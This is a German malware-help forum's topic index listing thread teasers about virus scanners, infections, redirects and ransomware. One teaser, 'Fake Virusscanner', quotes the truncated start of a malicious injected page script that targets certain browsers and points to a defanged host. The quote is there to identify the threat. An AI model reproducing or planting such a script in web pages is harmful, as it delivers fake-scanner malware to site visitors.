Zurück   Trojaner-Board > Themen

Alles zum Thema: Virusscanner

  Letzter Beitrag Antworten Hits Forum
verdächtigte ZIP datei
Virusscanner - Hallo Ich habe soeben eine Email erhalten mit einer ZIP Datei, (ja ich weiss, sorry) die habe geöffnet in meinem Downloadfenster, hab sie auch entpackt und dann sagte meine Firewall vorsicht gefährlicher Anhang, habe es nicht ausgeführt und sofort geschlossen. Dann habe ich meinen virenscanner...
Log-Analyse und Auswertung
verdächtigte ZIP. datei
Virusscanner - Hallo Ich habe soeben eine Email erhalten mit einer ZIP Datei, (ja ich weiss, sorry) die habe geöffnet in meinem Downloadfenster, hab sie auch entpackt und dann sagte meine Firewall vorsicht gefährlicher Anhang, habe es nicht ausgeführt und sofort geschlossen. Dann habe ich meinen virenscanner...
Mülltonne
Laptop wurde infiziert, 100% Datenträger und Chrome öffnet werbung
Virusscanner - Hallo, ich habe durch eine Zip datei virus bekommen und mein Laptop hat jetzt immer 100% Datenträger, sofort nachdem neustart. Ich habe Virusscanner COMODO runtergeladet hat scheinbar aber nicht geklappt, habe immer noch 100% Datenträger.Wenn ich auf Task-Manager gehe merke ich dass da sehr...
Plagegeister aller Art und deren Bekämpfung
Ich habe mir möglicherweise einen Trojaner eingefangen beim öffnen eines ZIP Files als Mail Anhang
Virusscanner - Irgendwie geschlafen und eine Fake Mail von der OnlinePayment GmbH aufgemacht zip file runtergeldaen und auch versucht zu öffnen. Mein normaler virusscanner Avast findet nix aber ich bin mir unsicher ob der Trojaner unter dem radar bleibt.
Log-Analyse und Auswertung
Win7-HomePremium - Outlook2010 versendet automatisch Mails
Virusscanner - Guten Abend Der PC meines Bruders versendet seit ca. 2 Wochen automatisch Mails aus Outlokk 2010. Unter gesendete Objekte sind diese jedoch nicht ersichtlich. Norten Virusscanner findet nix. Win7 - Home Premium 64BIT SP1 MS Outlook 2010
Log-Analyse und Auswertung
Mit Virus befallen, wie vorgehen?
Virusscanner - Hallo, Es ist mir schon peinlich aber ich komm hier nicht drum weg, Meine allzu Computerbegabte Schwester die ÄLTER als ich ist hat auf einer dieser ihr Media Player ist veraltet Seiten bla bla Seiten gedruckt. So Malwareantibytes Scan gemacht NOTHING. AVG Scan NOTHING und dann wollt ich heute...
Log-Analyse und Auswertung
neues Browserfenster leitet auf Werbesuchmaschine - qone8
Virusscanner - Hallo Ihr Lieben, ich habe mir beim Runterladen einer Software bei chip.de einen Virus eingefangen. Neben der eigentlichen Software wurden automatisch noch 4 weitere Programme runtergeladen, alle konnte ich deinstallieren bis auf qone8. Zudem öffnet sich jedes neue Browserfenster als gefakte...
Log-Analyse und Auswertung
Avast meldet Malware!
Virusscanner - Hallo, es ist wieder soweit! Avast spinnt und jedesmal, wenn ich eine Website mit Werbung oder Animation öffne, schlägt Avast Alarm (auch beim Trojaner-Board!!!). Es ist bereits einige Male geschehen und laut Avast, ist es ein Malware. Anbei die Meldung. Ich habe den Virusscanner laufen...
Plagegeister aller Art und deren Bekämpfung
Avast meldet Malware bei Google-Suche
Virusscanner - Hallo, wenn ich eine Suche in Google starte, schlägt Avast Alarm. Es ist bereits einige Male geschehen und laut Avast, ist es ein Malware und die Webadressen sind wie folgt: hxxp://www.google.de/webhp?source hxxp://www.google.de/coop/cse/brand?form Infektion URL:Mal Ich habe den...
Plagegeister aller Art und deren Bekämpfung
Archifbombe
Virusscanner - Hallo zusammen.Kann mir Bitte jemand erklären worum es sich bei einer Archifbombe handelt?? Dies wurde mir bei meinen letzten Virusscanner AVAST angezeigt.Bitte um Hilfe :daumenhoc
Plagegeister aller Art und deren Bekämpfung
google öffnet andere seiten
Virusscanner - Servus zusammen, Ich habe ein Problem: Wenn ich unter Mozilla google und mir die Suchergebnisse angezeigt werden, diese dann anklicke, werde ich auf andere Seiten weitergeleitet (i-havenet). Desweiteren habe ich gesehen das auf dem C-Laufwerk einige ordner gesperrt wurden.Als...
Plagegeister aller Art und deren Bekämpfung
Hab mir einen Guv Trojaner eingefangen
Virusscanner - Hi ich hab mir einen GUV Trojaner eingefangen mein Virusscanner hat Arlam geschlagen nach dem ich aus versehen auf einen Werbelink geklickt habe und eine Datei in Quarantänen gepackt die ich direct gelöscht hab und kurz drauf später kam die die GUV seite wo man bezahlen soll. Darauf bin ich hier...
Plagegeister aller Art und deren Bekämpfung
Fake Virusscanner
Virusscanner - Die Dateien werden von Webseiten heruntergeladen die diesen Code enthalten: < script > var url="hxxp://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var...
Plagegeister aller Art und deren Bekämpfung
BKA-Trojaner / Virus
Virusscanner - Ich habe den Gema/BKA/Bundespolizei Trojaner eingefangen. Ich habe mir Kaspersky Rescue Disk runtergeladen und per CD gebootet. Habe dann windowsunlocker ausgführt und die drei Registryeinträge gelöscht: NoDesktop ; DisableTaskMgr ; DisableRegistryTools. Dannach habe ich den beiliegenden...
Plagegeister aller Art und deren Bekämpfung
(2x) Weiterleitung nach abnow.com -PC noch sicher ??
Virusscanner - hilfe!!!!!!!!!!! ich habe mir so einenkack trojaner/virus eingefangen. der leitet meine google seite immer zu abnow.com das kaspersky tool konnte die weiterleitung abstellen. mein virusscanner hat aber heute folgende dateien erkannt und gelöscht:
Mülltonne
Virusscanner ? Welcher ist zu Empfehlen.
Virusscanner - Nun bin ich schon wieder Opfer eines Virus/Schadprogramms geworden. Leider trotz eines G-Data Virusscanners. Mit welchen Schutzprogrammen sollte man sich schützen. Gibt es da eine gute Empfehlung? Würde mich sehr über fundierte Empfehlungen freuen. Gruß Slemmy
Überwachung, Datenschutz und Spam
Bilder flackern über Bildschirm, nach Download auf GAMESCOPYWORLD
Virusscanner - Hey Leute, hab mir einen Gamefixer ( nicht böse sein ) auf GameCopyWorld.com runtergeladen. Daraufhin geöffnet und extrahiert. Seitdem fliegen und flackern Bilder ( wie eine Verzerrung des Bildes ) über meinen Bildschirm. Ich gehe schwer davon aus, dass es sich um einen Virus handelt. Mein...
Plagegeister aller Art und deren Bekämpfung
Trojaner Cn.WAQDN
Virusscanner - Hallo und ein herzliches Servus hier ans Forum! Ich wende mich an euch weil ich sonst - auch nach intensiver Googlesuche - nirgendwo mehr weis wo ich Hilfe bekommen könnte. Seit ein paar Tagen sagt mir Spybot und der AVG Virusscanner dass mein System mit einem sogenannten CN.WaQdN Trojaner...
Plagegeister aller Art und deren Bekämpfung
Google verlinkt auf Malware Virus
Virusscanner - Hallo, ich habe da ein kleines Problem. Wenn ich folgendes im google Suchfeld eingebe: hotdog wagen erhalte ich einen Link der mich zu einer Seite mit einem Virusscanner weiterleitet und nicht die Seite die im Suchergebnis steht, nämlich (hotdogtown.de). Wenn ich jetzt aber...
Plagegeister aller Art und deren Bekämpfung
Trojaner und kein Ende
Virusscanner - Hallo zusammen Also das mit dem Trojaner ist ja wirklich eine Epedemie. Mein AntiVir Virusscanner hat mir einen Vundo.Gen im System32\gebba.dll angezeigt. Bekomme ihn leider auch mit dem AntiVir nicht weg. Habe Vundofix V6.7.7 durchlaufen lassen. Der zeigt mir aber einen Vundo-Trojaner im...
Plagegeister aller Art und deren Bekämpfung
Wurm Worm/vb.CSP am USB-Stick
Virusscanner - AVG Free Edition findet auf meinem USB-Stick diesen Virus: Knight.exe Virus indentified Worm/vb.CSP Befindet sich auf meinem USB Stick! Avira Antivi findet keinen Virus. Auf virustotal.com/de kann ich die Datei nicht hochladen - zum scannen!
Plagegeister aller Art und deren Bekämpfung
clown.dll - was ist das?
Virusscanner - Hallo Leute, seit einer Woche kommt ständig von meinem Virusscanner das er den Virus Clown.dll gefunden habe und ihn löschen würde. Gesagt getan, er kommt aber regelmässig wieder. Ich finde jedoch im Netz keinerlei Infos zu diesen Virus/Trojaner. Wie bekomm ich ihn entgültig weg? Danke im Voraus...
Mülltonne
Virus ? Schon wieder?
Virusscanner - Hallo Hatte vor eine paar Tagen mein Problem erläutert ! Jetzt habe ich mal wieder das gleiche ! Ich bekomme die Meldung das eine Datei in der Registrie wieder erfolreich hergestellt wurde ! ( aber nicht welche ) Wenn das jetzt so weitergeht wie vorher dann habe ich spätestens am Sonntag nach...
Log-Analyse und Auswertung
Hilfe e-mail dorithie im Anhang Henrie.zip
Virusscanner - Hallo habe heute im Posteingang eine e-mail mit der eigenen e-mail adresse erhalten und den Anhang geöffnet. Nun sind alle Virensuchprogramme deaktiviert. Was kann ich machen? PS: 1 schritt neuen virusscanner aus dem netz gesaugt und der wird im setup blockiert. stinger durchlaufen lassen...
Plagegeister aller Art und deren Bekämpfung
Allg.Fragen zu Trojanern, Virusscanner etc... ( Anfängerin)
Virusscanner - Hallo! Bin Computer - Anfängerin und habe mich im Forum umgeschaut, um mir Rat zu holen. Leider verstehe die meisten Bezeichnungen und Beschreibungen nicht. Vermutlich hat mein PC einen Trojaner heruntergeladen, denn auf meinem Bildschirm tauchen Pop-ups z.B. von crazywinnings inc. auf, die...
Plagegeister aller Art und deren Bekämpfung
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.